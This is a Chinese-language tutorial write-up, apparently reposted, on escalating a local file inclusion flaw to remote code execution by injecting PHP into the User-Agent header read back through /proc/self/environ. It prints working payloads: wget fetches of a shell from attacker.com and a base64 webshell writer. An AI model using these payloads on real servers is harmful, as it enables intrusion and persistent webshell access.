怎么通過構造User-Agent請求頭內容實現LFI到RCE提權

這篇文章將為大家詳細講解有關怎么通過構造User-Agent請求頭內容實現LFI到RCE提權，文章內容質量較高，因此小編分享給大家做個參考，希望大家閱讀完這篇文章后對相關知識有一定的了解。

下面通過對請求User-Agent內容構造，成功實現從本地文件包含漏洞（LFI）到遠程代碼執行漏洞（RCE）的提權。

發現LFI漏洞

以下為目標網站的Contact Us鏈接路徑：

https://www.website.com/index.php?pg=contact.php

經過對pg參數的fuzz，我發現其中存在LFI漏洞，可以用../../../../etc/passwd直接讀出系統密碼信息：

https://www.website.com/index.php?pg=../../../../etc/passwd

從LFI到RCE

要想把LFI提權到RCE, 我又發現另一個可讀路徑/proc/self/environ，于是我有了以下構造：

https://www.website.com/index.php?pg=../../../../proc/self/environ

很好，從其輸出中可以看到，其中包含了如HTTP_USER_AGENT等一些環境變量參數：

不錯，開啟BurpSuite，用system()方法更改請求中的User-Agent值：

User-Agent: <?system('wget http://attacker.com/shell.txt -O shell.php');?>

不行，無效。再試試exec()方法：

User-Agent: <?exec('wget http://attacker.com/shell.txt -O shell.php');?>

也是不行，無效。那用phpinit()試試：

User-Agent: <?php phpinfo(); ?>

折騰了一陣后，我差點忘了我是可以向目標網站服務器寫東西的啊，于是我就又在User-Agent頭中構造了以下Payload：

User-Agent: <?php $a = base64_decode('PD9waHAgCiAgJGEgPSAkX1BPU1RbJ2NvZGUnXTsKICAkZmlsZSA9IEBmb3BlbigkX1BPU1RbJ2ZpbGUnXSwndycpOwogIEBmd3JpdGUoJGZpbGUsJGEpOwogIEBmY2xvc2UoJGZpbGUpOwo/Pgo8Y2VudGVyPgogIDxmb3JtIG1ldGhvZD0icG9zdCIgaWQ9ImZvcm0iPgogICAgPGgyPkZpbGUgV3JpdGVyPC9oMj4KICAgIEZpbGUgTmFtZTxicj48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iZmlsZSIgcGxhY2Vob2xkZXI9InNoZWxsLnBocCI+PGJyPgogICAgU2hlbGwgQ29kZTxicj48dGV4dGFyZWEgbmFtZT0iY29kZSIgZm 9ybT0iZm 9ybSIgcGxhY2Vob2xkZXI9IlBhc3RlIHlvdXIgc2hlbGwgaGVyZSI+PC90ZXh0YXJlYT48YnI+CiAgICA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iV3JpdGUiPgogIDwvZm 9ybT4KPC9jZW50ZXI+Cg=='); $file = fopen('nadeshot.php','w'); echo fwrite($file,$a); fclose($file); ?>

解釋上述構造的Payload

上述構造使用的最終Payload是一個base64編碼的webshell，原代碼文件存在于Github庫中-https://github.com/alita-ido/PHP-File-Writer/blob/master/lfi-writer.php，其大概造型為：

$a = base64_decode('webshell_base64_encoded_code_here');

然后我們向服務器中寫入了一個名為nadeshot.php的文件：

$file = fopen('nadeshot.php','w');

然后服務器會把base64編碼的上述文件寫入nadeshot.php文件：

echo fwrite($file,$a);

再保存文件：

fclose($file);

上述請求Payload執行后的BurpSuite動作如下：

響應成功。希望我們的Webshell可以成功，訪問https://website.com/nadeshot.php試試看：

Webshell寫入成功，保存為了nadeshot.php，太好了，我們再接著往里寫入nadeshot.txt文件試試：

然后訪問https://website.com/nadeshot.txt，一樣有效：

就這樣，成功實現了從LFI到RCE的提權。

關于怎么通過構造User-Agent請求頭內容實現LFI到RCE提權就分享到這里了，希望以上內容可以對大家有一定的幫助，可以學到更多知識。如果覺得文章不錯，可以把它分享出去讓更多的人看到。